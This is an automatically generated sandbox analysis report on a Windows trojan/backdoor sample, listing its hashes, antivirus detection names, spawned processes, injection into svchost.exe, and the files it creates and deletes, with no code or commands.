Skip to main content

Gen.Variant.Kazy.626730_eb321fe996


Trojan.Win32.Inject.uwpn (Kaspersky), Gen:Variant.Kazy.626730 (B) (Emsisoft), Gen:Variant.Kazy.626730 (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: eb321fe9961ba299bafbba7448b04d29

SHA1: 4d714a0ca7db64d15e961a38e86ab03331902077

SHA256: c639c63acfbfa4d3621cc001303eb1c739262f4800efdced7763b539d06eb52a

SSDeep: 12288:Hnx74VxVQziArJhDbd ju2qNQ8w0E1Xg6tkN33wjGkcR:RuQz/N ju/u8USx3xR

Size: 541222 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company:

Created at: 2015-06-03 20:09:24

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mofcomp.exe:2556
WindowsXP-KB968930-x86-ENG.exe:176
ngen.exe:3900
ngen.exe:3924
ngen.exe:3916
ngen.exe:3496
ngen.exe:3908
ngen.exe:3416
ngen.exe:3536
ngen.exe:3452
ngen.exe:3552
ngen.exe:3576
ngen.exe:3436
ngen.exe:3940
ngen.exe:3488
ngen.exe:3932
ngen.exe:3520
ngen.exe:3528
ngen.exe:3544
ngen.exe:3560
ngen.exe:3428
ngen.exe:3460
ngen.exe:3376
ngen.exe:3568
ngen.exe:3444
update.exe:1716
%original file name%.exe:464
PSCustomSetupUtil.exe:3592
PSCustomSetupUtil.exe:2596
PSCustomSetupUtil.exe:2900
PSCustomSetupUtil.exe:3776
PSCustomSetupUtil.exe:3612
PSCustomSetupUtil.exe:3736
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:3008
PSCustomSetupUtil.exe:3660
PSCustomSetupUtil.exe:3124
PSCustomSetupUtil.exe:2744
PSCustomSetupUtil.exe:2968
PSCustomSetupUtil.exe:3080
PSCustomSetupUtil.exe:2620
PSCustomSetupUtil.exe:2768
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:2720
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3708
PSCustomSetupUtil.exe:3800
PSCustomSetupUtil.exe:3056
PSCustomSetupUtil.exe:2836
PSCustomSetupUtil.exe:3644
PSCustomSetupUtil.exe:2680
PSCustomSetupUtil.exe:3032
PSCustomSetupUtil.exe:3684
PSSetupNativeUtils.exe:4084
mscorsvw.exe:2596
mscorsvw.exe:2432
mscorsvw.exe:3888
mscorsvw.exe:2344
mscorsvw.exe:2052
mscorsvw.exe:2056
mscorsvw.exe:1612
mscorsvw.exe:2248
mscorsvw.exe:504
mscorsvw.exe:2504
mscorsvw.exe:2116
mscorsvw.exe:2428
mscorsvw.exe:2440
mscorsvw.exe:580
mscorsvw.exe:3588
mscorsvw.exe:3400
mscorsvw.exe:3248
mscorsvw.exe:2316
mscorsvw.exe:3372
mscorsvw.exe:2168
mscorsvw.exe:372
mscorsvw.exe:2536
mscorsvw.exe:2160
mscorsvw.exe:516
wsmanhttpconfig.exe:2476
wsmanhttpconfig.exe:2536

The Trojan injects its code into the following process(es):

svchost.exe:640
svchost.exe:932

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process mofcomp.exe:2556 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:176 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea6d03fb84304f0031a48a\about_requires.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_methods.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_signing.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.mof (789 bytes)
C:\ea6d03fb84304f0031a48a\update\update.inf (2457 bytes)
C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (14 bytes)
C:\ea6d03fb84304f0031a48a\about_throw.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (9 bytes)
C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (15 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (16 bytes)
C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\winrscmd.dll (2907 bytes)
C:\ea6d03fb84304f0031a48a\wsmsvc.dll (15909 bytes)
C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (481 bytes)
C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\spmsg.dll (495 bytes)
C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\$Directory (800 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (16567 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll (5010 bytes)
C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (17 bytes)
C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (512 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea6d03fb84304f0031a48a\wsmres.dll (6164 bytes)
C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (595 bytes)
C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (379 bytes)
C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (659 bytes)
C:\ea6d03fb84304f0031a48a\pwrshsip.dll (24 bytes)
C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (657 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea6d03fb84304f0031a48a\about_split.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_variables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_providers.help.txt (59 bytes)
C:\ea6d03fb84304f0031a48a\winrssrv.dll (12 bytes)
C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.dll (1842 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\eventforwarding.adm (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea6d03fb84304f0031a48a\winrm.cmd (35 bytes)
C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\about_trap.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (1492 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.dll (591 bytes)
C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea6d03fb84304f0031a48a\about_locations.help.txt (794 bytes)
C:\ea6d03fb84304f0031a48a\about_operators.help.txt (770 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (887 bytes)
C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\spupdsvc.exe (287 bytes)
C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (1011 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (33 bytes)
C:\ea6d03fb84304f0031a48a\winrm.ini (1956 bytes)
C:\ea6d03fb84304f0031a48a\update\update.ver (14 bytes)
C:\ea6d03fb84304f0031a48a\about_join.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_continue.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (37 bytes)
C:\ea6d03fb84304f0031a48a\about_modules.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea6d03fb84304f0031a48a\help.format.ps1xml (3947 bytes)
C:\ea6d03fb84304f0031a48a\update\update.exe (10748 bytes)
C:\ea6d03fb84304f0031a48a\spuninst.exe (3787 bytes)
C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (802 bytes)
C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (26041 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (3153 bytes)
C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea6d03fb84304f0031a48a\update\eula.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea6d03fb84304f0031a48a\about_do.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\winrs.exe (1154 bytes)
C:\ea6d03fb84304f0031a48a\about_return.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\about_properties.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_while.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_if.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe (7339 bytes)
C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (266 bytes)
C:\ea6d03fb84304f0031a48a\about_break.help.txt (792 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (2 bytes)
C:\ea6d03fb84304f0031a48a\winrm.vbs (2727 bytes)
C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\update\updspapi.dll (5940 bytes)
C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\default.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (417 bytes)
C:\ea6d03fb84304f0031a48a\update\spcustom.dll (23 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (457 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (438 bytes)
C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (221 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (775 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (2816 bytes)
C:\ea6d03fb84304f0031a48a\winrsmgr.dll (2 bytes)
C:\ea6d03fb84304f0031a48a\wsmpty.xsl (1 bytes)
C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (276 bytes)
C:\ea6d03fb84304f0031a48a\about_history.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_for.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.mof (4 bytes)
C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_objects.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll (38414 bytes)
C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (344 bytes)
C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (168 bytes)
C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (950 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (824 bytes)
C:\ea6d03fb84304f0031a48a\update (4 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (574 bytes)
C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (14450 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe.mui (10 bytes)
C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea6d03fb84304f0031a48a\wevtfwd.dll (3351 bytes)
C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_functions.help.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea6d03fb84304f0031a48a\types.ps1xml (2510 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (1756 bytes)
C:\ea6d03fb84304f0031a48a\about_ref.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (20 bytes)
C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (133 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (590 bytes)
C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (4803 bytes)
C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (76 bytes)
C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (155 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (411 bytes)
C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (3009 bytes)
C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_switch.help.txt (489 bytes)
C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea6d03fb84304f0031a48a\about_remote.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.exe (2526 bytes)
C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (12 bytes)
C:\ea6d03fb84304f0031a48a\$shtdwn$.req (788 bytes)
C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (21 bytes)
C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (603 bytes)
C:\ea6d03fb84304f0031a48a\winrshost.exe (22 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\profile.ps1 (772 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll (1145 bytes)
C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (316 bytes)
C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (837 bytes)
C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (3 bytes)

The Trojan deletes the following file(s):

C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_requires.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_methods.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_signing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.mof (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.inf (0 bytes)
C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_throw.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_if.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrscmd.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmres.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a (0 bytes)
C:\ea6d03fb84304f0031a48a\default.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_split.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_while.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_providers.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrssrv.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmpty.xsl (0 bytes)
C:\ea6d03fb84304f0031a48a\eventforwarding.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.cmd (0 bytes)
C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_trap.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\_537593_ (0 bytes)
C:\ea6d03fb84304f0031a48a\about_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\spupdsvc.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.ini (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.ver (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_continue.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_modules.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_return.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\eula.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_do.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\spuninst.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmsvc.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshsip.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_break.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.vbs (0 bytes)
C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update\updspapi.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_properties.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update\spcustom.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrsmgr.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_history.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_for.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.mof (0 bytes)
C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_objects.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\help.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_join.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.dll (0 bytes)
